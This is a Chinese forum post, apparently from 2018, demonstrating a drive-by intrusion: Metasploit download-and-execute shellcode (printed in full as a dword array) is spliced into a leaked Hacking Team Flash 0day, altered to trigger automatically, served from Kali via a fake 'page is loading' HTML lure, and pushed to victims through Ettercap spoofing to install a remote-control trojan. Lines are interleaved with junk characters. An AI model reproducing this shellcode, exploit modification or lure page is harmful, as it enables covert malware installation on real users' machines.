|
! u) o) y/ g' T1 a5 r) Z6 `7 \9 ? 三、flash 0day之手工代码修改制作下载者实例入侵演示
( Z- t9 `# b, Z2 W$ X + P' q. X, j4 f K' c, V) ~
) S, s: D z) V( f- }8 C5 a, w: R% Y 利用到的工具: 6 U; v c$ H& r. Y/ F/ E
2 Z3 W+ l$ E$ L, r/ \" s) b. y" y( R9 e" b2 `( {, Y
Msf
' |( w, ?/ Y2 j) A4 i% [
- D; K) k% c/ G8 V. ?2 _2 C7 b9 a1 p4 l2 G* O
Ettercap
# L. x% R, l2 E , A9 D3 r: |" u
* r) d8 |, W5 \; n! X Adobe Flash CS6
9 P, k, \1 i' r' t
$ {3 P) \6 d g% [9 b
5 v; ?6 m0 {3 u: f Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " i1 v% V/ ?, w3 S
& T" ^2 [7 J. Q. e" P
$ u* O/ E. v* o$ ^. ~
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
* u) x H. \7 x1 a 1 g8 q, ?0 }1 x( I5 W
! i& G7 W* T* ^" [+ X
如图: % R" {5 u( r. r6 ?3 c2 k) h
- e' [ `1 Q: k8 P" `
4 O0 Q9 S& o6 u
" C ^2 M/ K* y' A! y" r
0 u- M: X% | e: j) {4 |6 H P+ \
& L0 H4 U, p; M1 u. o: R5 I . c% K: ]; n) ]1 {4 I3 f
# Q+ V9 }* @, r, B% W9 d( n/ G- |+ E
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
1 H* e }; r _; B; [
5 a+ M8 S2 G( i2 q9 u y5 {% G6 P/ y: M& P
" j& s: \+ u0 X0 z
- R; e8 _4 v% F' w9 N
2 G/ V4 ]0 |7 n3 M! j3 E! y  5 c% H- a0 H. M" x5 I! j1 R2 a2 O
1 C1 `8 a* g7 ]5 W
/ K- M; J; E! E9 j4 S 然后执行generate -t dword生成shellcode,如下: ' u5 K3 a: ` T5 L& U
$ n [# B( N: ?9 [5 s9 i: W: q- X6 g
1 w; a! A) U5 Q8 y- e
' |' p) }: M' I6 x5 T& b! F$ q; ^) D: m5 f. h1 C1 L* v1 R' M
复制代码到文本下便于我们一会编辑flash exp,如下: / R% n+ s& q4 [) w5 o$ b" t
" m3 `: S( b* H( l0 ~% H8 H
/ X- M) E" Z5 M+ h6 |
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ) X( s+ {# d% J7 D" b
. p6 I: A+ x* w
/ {) | s- ~4 V% v8 q7 g! O
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ( @' t& q$ a0 w3 S9 p
w0 \9 N8 g- |! I
$ q( _2 F0 E+ }. a' u0 V- t* f 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ( R7 z9 G7 X, Z# E, V$ F# O
* W. [3 f3 T- w: [6 [
7 F) u' ~1 G+ o! ^1 j7 D V
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
/ N4 @+ ?; L% p* F
1 F! f+ | K3 E7 c8 A! n
1 I8 ^! _; v( k/ t" z 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ' y9 s# q+ N% z9 ]) Z3 d
! v# ^# j& f; {+ p* f
5 n* Z3 P6 R4 i* I: s2 l) _
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
- [& n7 u; u- B- D2 [3 h $ ]" X' n3 L. B2 Z8 ~8 R" [
4 Y3 ^, Q ^ R8 o/ {4 ^; m 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
$ g4 E4 U: I. J5 m0 f" e $ L) R( E6 x; w$ ]
! ~* V2 k, v1 F 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
$ e' z$ T5 J& {# j- T8 H
5 @0 Y4 M1 Z( k( r4 n4 n" Z! L2 r9 B& N3 O
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ! O1 H: X/ C$ [5 p
- ^ a% X) A. Q- \1 w4 u( W. i' S" u$ F6 e' o$ `
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, } _5 X7 w' ]) r7 x
: l+ y4 h {. B. X) J7 Q( Z% M6 m
9 q: X* k' b% K3 [2 U 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
/ v3 p0 r" ~( s9 \9 p2 `8 }
8 m7 z J9 Z s [7 k$ K
: I/ O. r+ {$ S* K- p. | 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
$ i5 |7 e3 {' @! n3 Y% c : U) s! }+ j8 f" Y* \
! a3 x* J3 ^8 n$ G; @- J
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ' M8 L2 v& k6 V8 f1 @' m0 o
. d, Z3 M* E, S0 {% N: s6 b5 j+ d, m0 ]5 v
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 2 Z: e1 M; d4 G3 U2 C* `
T' v: W8 c3 K7 p
- y! i$ f% h9 N+ h; ^
1 k) A& @, m* p7 ? 7 K# \2 J* K) N8 l
& x9 Z# d$ Q! q4 z
) I) y& E" o4 e- Y5 G5 @( u
9 C+ \; T; Q4 `' Y
- k4 j: n0 Y' ]* _0 | 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
4 P7 O2 A2 a0 P; |, `; t 4 r& J' Q2 O e" K9 b' d: B# o
! |8 h8 S& ?4 [+ ~3 G
 ) r9 _6 y0 w4 ?% }
: Z9 B2 O, Q! X- Z. k0 O
! {2 }$ u5 r- ]6 g$ ~ 先修改ShellWin32.as,部分源代码如图:
# P" n8 q, F8 q2 c
$ T: w% D9 Y! O
# U2 Q% _" C4 f% g9 e  9 D" f( O# G& L4 L$ s% W4 r: D
8 t, N' u1 i$ P1 w, Q
5 N2 }* s9 r; b L5 S 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
- G; \3 ^4 r3 ^6 z- B0 [, h, J, e4 H
2 B x( l% w! C2 }, x8 n# I9 F0 C* S4 P" M x; w7 Z" Q
 8 Z `3 g: b" Y- _9 i
: h' S0 }+ K% Q+ t6 `' m4 ?* t& \6 ^+ m3 k
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
, r8 @7 w' e9 k& V, G
( D1 M! c+ `. R% z5 U$ i3 v# _; e2 M% ]
+ k7 H6 Z1 ?' g+ E 8 u: J2 p0 ^) k7 S7 m+ Z
+ P. h& ^. c( N
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
% d! e/ c9 h3 p4 l 2 E; H K p0 B3 S. F0 ^8 C
% N+ H% q; \) G/ U* F
, {( d# K5 ]) g8 w
8 `+ T8 u+ p$ h2 Z: r0 j. T8 W# N6 g2 a: W
$ C: u$ s- O% H! m/ s
' |% R* p" y* D/ W% ]) j
! f+ F, ^ D7 j: r* N 
5 V- ~0 c6 R& H: @ | a" k; f3 e! D
5 V* c2 r8 W, s5 ?
然后点保存,下面我们来编译一下,打开 1 n7 N" m( _& x$ e8 ~9 L! B+ H2 j/ u
, T3 ]9 V4 ?& h. u3 |7 G, e
0 w4 R; j! R% a4 O+ X exp1.fla然后点文件-发布,看看编译没错误
3 d. f9 U: |: ~ " M. p# D1 l" l6 s0 k
t1 m( U' z% @1 Z* w
; N8 P# i" W- B) s ) q/ [5 t4 N: M# L2 F- Q
8 k* X0 w/ @, X, x( x# [% T
" [" S4 {) b4 F2 n" k0 O6 m& O E* w9 p6 P% o. W5 D/ g
8 x6 W8 `! n& w' F# H
4 ?' C) g. R! B7 N / L. n# R; F4 y1 a& W* l2 _
" e C# v( [7 U, l1 w ]/ o 
$ i3 ^: ?" L6 y. e1 ?; Y $ U6 M6 V e$ w% Q: I
0 t. s4 z' C7 X4 f) B1 P( z8 n# K* S. T 然后我们把生成的
1 S0 f+ Y3 ^/ i7 N
8 k4 y, [& j2 X+ f/ c; s# E
4 _$ l% j1 ^8 l' `, M exp1.swf丢到kailinux 的/var/www/html下: / w1 ?2 K5 h) {3 Q
& i0 G& i/ O4 P$ T8 a
8 R. n6 s. q; a/ ?3 F$ y 然后把这段代码好好编辑一下
, H5 f. e9 u( \8 t5 j
/ h# I) j. d9 e
4 i2 i0 o; l- x8 t2 _9 Q/ u
|; c2 ~8 x: N5 ?" \
% U# [2 U: g9 u# c" f% l% Q1 X* V1 Q# [& d9 l- `6 U/ W
0 ^. O+ v c: {3 G4 ?, C
2 ]' R$ k4 t; {2 M8 B8 P) T- U4 V3 ^
* s2 |8 {5 p% O8 L) R R
8 U9 H2 N* P7 K: [9 o" x2 V4 o( K
0 ?1 V4 U1 c4 ]
' G( a- _+ |1 r0 j8 V' Z
4 `& r5 ~0 Q+ J! y; x
4 v: U5 u, H* D; @# ]. z & F% @6 x' {8 A5 L1 s
! U, G' h: d2 A/ r) {' Q
# O) I# g/ ~ C% u7 O0 T8 q& ^ F$ ~; r/ H, X: Q1 r3 O) t2 }8 X
' X( T: X) V5 W/ z. [: [0 I2 o' m" Z; d( O
<!DOCTYPE html>
! `; [6 A3 g( n4 M ' n, T! z8 T" a: @+ _5 Y2 F
& [# }# i* N2 Y8 ]3 A <html>
1 @3 D1 z# p, M . y4 R6 u/ y- C7 ]
; w' ~! D- q- D0 R+ B4 }6 |0 S0 I8 U
<head> 6 Z1 U! J3 z7 b" a
0 ` Y/ v: w/ g
/ E6 T9 c5 u. F& u <meta http-equiv="Content-Type" content="text/html; 9 I' V3 ]# Z k5 z
@: x/ u! r0 {) I: B+ b
5 s z1 j- H8 _5 i6 M* F) C& K* y charset=utf-8"/>
+ k# I0 R$ o6 A+ O% L9 d. \
" l/ ]% W( G( w% a9 `. o* W9 t. l2 j6 U: I9 m6 t
</head> / T: A4 l+ r {# x4 |+ @$ d. y
; [" S$ Q% V& t8 q3 w' R
- ^- d8 M1 u9 ~4 s
<body>
! L& G5 j- H. u
n# }0 A. F: E- t
1 e D% _+ I8 v$ Z! K <h2> Please wait, the requested page is loading...</h2>
& R d) X5 [2 N) f8 P
5 [; R- \; R8 ~0 u3 ^6 f
1 }1 Y T9 _3 }9 z <br> 7 u4 |. B+ J, B: f( ] ~% X0 U
" K0 B! d1 C) @# E r: G
+ r1 H+ }5 x" t2 |9 P8 y& J3 m# B) [ <OBJECT
% k% ?1 k7 p3 |/ X8 p0 }/ E' j! e
! A6 V1 i+ q; n8 _* v0 m
b& |+ x, `: o1 H ?) U classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 5 O) o& r a- f. s
6 b q# _- U0 @* b
8 \. Z3 B" j: E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 1 p0 m Y0 r% X/ N
- Z- P, Y8 l H$ ~! p
- K& W$ V+ t2 \' Z4 ~ L2 n
</body>
- I; D8 ^# t8 h+ T1 h( P5 \5 r
; j# d. f/ W! R& h' h, j# F; n/ I- `
<script>
5 h) w1 W3 J3 w' z: ~+ J& c ; n1 d+ B/ C# z: V# ]3 i. G
1 w" w6 h: D4 g2 x2 S4 a* m setTimeout(function () { : m/ r" S) O d; A' A
" v' R0 P6 R% M6 b' I' [3 {: B/ D3 x5 n; M6 s7 V1 Z. E g
7 Q3 O1 w% z* P: _2 T& Q; E# x
+ R2 Z2 ?6 X% @, o; H. _* T0 Y0 K! ?( ^
window.location.reload();
# o0 M: _* P8 }. {% {' ?6 L8 W
- b& b3 L1 B; ^7 Z& {5 j$ u+ B2 n+ Z% k C
}, 10000); + [4 B! x. G; {: g; J! J
- e! X8 b" A4 H2 @% r' }1 Q8 A
) i5 c6 O8 q* Q7 H5 |, E
s4 W5 w: z1 k 1 F) }/ k0 n) h7 J" I$ a0 r
( o2 k# k1 x5 D </script> 9 B0 {4 }$ U5 w
- K M) W; E8 X- r# c
2 U! B5 A( d; ^9 y </html> + O5 |4 \; _2 s8 P3 d# n
) j& e/ v9 d/ k* z; ^% V$ @
% ~3 w) u! C3 V: V& N8 Q
5 T. E2 y8 N* l& z0 ~5 C
! T- Y8 O2 E1 f' F0 L& A
7 w3 S" {) l5 f8 Y# s 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
5 U% g' Z6 H4 M R+ Z) I
$ y9 s8 g- K+ k
& l" ?* @6 s" P 
6 P8 `# i! u7 z( X( H1 L . c1 B% s- I1 b: O* A; @+ D
' [& u5 Q* s$ D8 \( F) p3 T
2 L5 i( Z/ M0 A- N( `% I
' h5 S' E( V/ x! X
* o3 G; s$ a8 N5 E i5 z% \ i
6 K) Z/ i2 |* W; s : M' A$ u5 K( ?9 m# a
) u: n& [$ o3 R. e& h% J- _' L) e0 w
* J" S7 r0 g& }: h9 _9 k 4 c0 R+ F3 b" {
! n5 A: p, y9 L3 \" n, x1 A
, s# `: k+ g& |6 a & c6 a, @- S' G# D- B! M+ I
( c) I+ T0 ^4 I4 Z9 H; e+ R
下面我们用ettercap欺骗如图:
7 n% @, O C2 v/ D 4 u+ w9 u: O- ]0 U: w
1 b; _. \' ~% J" `
5 _8 i# t6 E2 g2 W8 Q# z: h
( B4 v3 E' @/ l: E& ?( F1 P( q- k, W" L3 S! f/ C. W( Q
; t. \: @0 x4 W$ n7 m4 L ]$ }1 N
' g* b/ }. Q) |
! n/ E7 J, m8 W$ Q; ?
下面我们随便访问个网站看看:
/ _" I, C6 ]# j 4 ?1 f9 Z2 |: x. |5 l" l2 d
( D5 o5 [3 A |9 _4 b0 F
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ; }( }1 b( J+ q Y$ n
" h; w2 f+ K. o# ^2 l5 f' o* E4 ?% r
3 j9 [; e. ^- m% W3 z7 f  - z5 J4 B+ F. ~( r4 M, S( x! W. j: l
# ^9 ?; y2 C0 D# b; o1 G
9 l4 A6 l4 L& s: X3 ? 我们看另一台, , p: f$ n+ {7 E {- b* K
1 ]3 |1 z+ v: Q8 ]
4 A$ _) |2 M$ n( E
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
5 \7 ^: q7 j; y( P | 
发表于 2018-10-20 20:28:55
收藏
支持
反对